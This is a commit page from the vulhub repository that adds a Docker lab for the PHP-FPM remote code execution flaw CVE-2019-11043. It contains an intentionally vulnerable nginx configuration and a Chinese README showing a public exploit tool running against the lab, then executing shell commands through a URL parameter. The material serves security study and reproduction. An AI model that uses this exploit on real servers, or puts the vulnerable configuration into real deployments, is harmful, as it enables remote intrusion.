Skip to content

Commit 8b53d06

Browse files
authored
Merge pull request vulhub#146 from vulhub/php-cve-2019-11043
add CVE-2019-11043
2 parents bc366f6 + dca87de commit 8b53d06

6 files changed

Lines changed: 93 additions & 0 deletions

File tree

php/CVE-2019-11043/1.png

52.6 KB
Loading

php/CVE-2019-11043/2.png

24.8 KB
Loading

php/CVE-2019-11043/README.md

Lines changed: 49 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,49 @@
1+
# PHP-FPM 远程代码执行漏洞(CVE-2019-11043)
2+
3+
在长亭科技举办的 Real World CTF 中,国外安全研究员 Andrew Danau 在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。
4+
5+
在使用一些有错误的Nginx配置的情况下,通过恶意构造的数据包,即可让PHP-FPM执行任意代码。
6+
7+
参考链接:
8+
9+
- https://bugs.php.net/bug.php?id=78599
10+
- https://lab.wallarm.com/php-remote-code-execution-0-day-discovered-in-real-world-ctf-exercise/
11+
- https://github.com/neex/phuip-fpizdam
12+
13+
## 漏洞环境
14+
15+
执行如下命令启动有漏洞的Nginx和PHP:
16+
17+
```
18+
docker-compose up -d
19+
```
20+
21+
环境启动后,访问`http://your-ip:8080/index.php`即可查看到一个默认页面。
22+
23+
## 漏洞复现
24+
25+
使用<https://github.com/neex/phuip-fpizdam>中给出的工具,发送数据包:
26+
27+
```
28+
$ go run . "http://your-ip:8080/index.php"
29+
2019/10/23 19:41:00 Base status code is 200
30+
2019/10/23 19:41:00 Status code 502 for qsl=1795, adding as a candidate
31+
2019/10/23 19:41:00 The target is probably vulnerable. Possible QSLs: [1785 1790 1795]
32+
2019/10/23 19:41:02 Attack params found: --qsl 1790 --pisos 152 --skip-detect
33+
2019/10/23 19:41:02 Trying to set "session.auto_start=0"...
34+
2019/10/23 19:41:02 Detect() returned attack params: --qsl 1790 --pisos 152 --skip-detect <-- REMEMBER THIS
35+
2019/10/23 19:41:02 Performing attack using php.ini settings...
36+
2019/10/23 19:41:02 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs
37+
2019/10/23 19:41:02 Trying to cleanup /tmp/a...
38+
2019/10/23 19:41:02 Done!
39+
```
40+
41+
![](1.png)
42+
43+
可见,这里已经执行成功。
44+
45+
我们访问`http://your-ip:8080/index.php?a=id`,即可查看到命令已成功执行:
46+
47+
![](2.png)
48+
49+
注意,因为php-fpm会启动多个子进程,在访问`/index.php?a=id`时需要多访问几次,以访问到被污染的进程。

php/CVE-2019-11043/default.conf

Lines changed: 27 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,27 @@
1+
server {
2+
listen 80 default_server;
3+
listen [::]:80 default_server;
4+
5+
root /usr/share/nginx/html;
6+
7+
index index.html index.php;
8+
9+
server_name _;
10+
11+
location / {
12+
try_files $uri $uri/ =404;
13+
}
14+
15+
location ~ [^/]\.php(/|$) {
16+
fastcgi_split_path_info ^(.+?\.php)(/.*)$;
17+
include fastcgi_params;
18+
19+
fastcgi_param PATH_INFO $fastcgi_path_info;
20+
fastcgi_index index.php;
21+
fastcgi_param REDIRECT_STATUS 200;
22+
fastcgi_param SCRIPT_FILENAME /var/www/html$fastcgi_script_name;
23+
fastcgi_param DOCUMENT_ROOT /var/www/html;
24+
fastcgi_pass php:9000;
25+
}
26+
27+
}
Lines changed: 15 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,15 @@
1+
version: '2'
2+
services:
3+
nginx:
4+
image: nginx:1
5+
volumes:
6+
- ./www:/usr/share/nginx/html
7+
- ./default.conf:/etc/nginx/conf.d/default.conf
8+
depends_on:
9+
- php
10+
ports:
11+
- "8080:80"
12+
php:
13+
image: php:7.2.10-fpm
14+
volumes:
15+
- ./www:/var/www/html

php/CVE-2019-11043/www/index.php

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,2 @@
1+
<?php
2+
echo "hello world";

0 commit comments

Comments
 (0)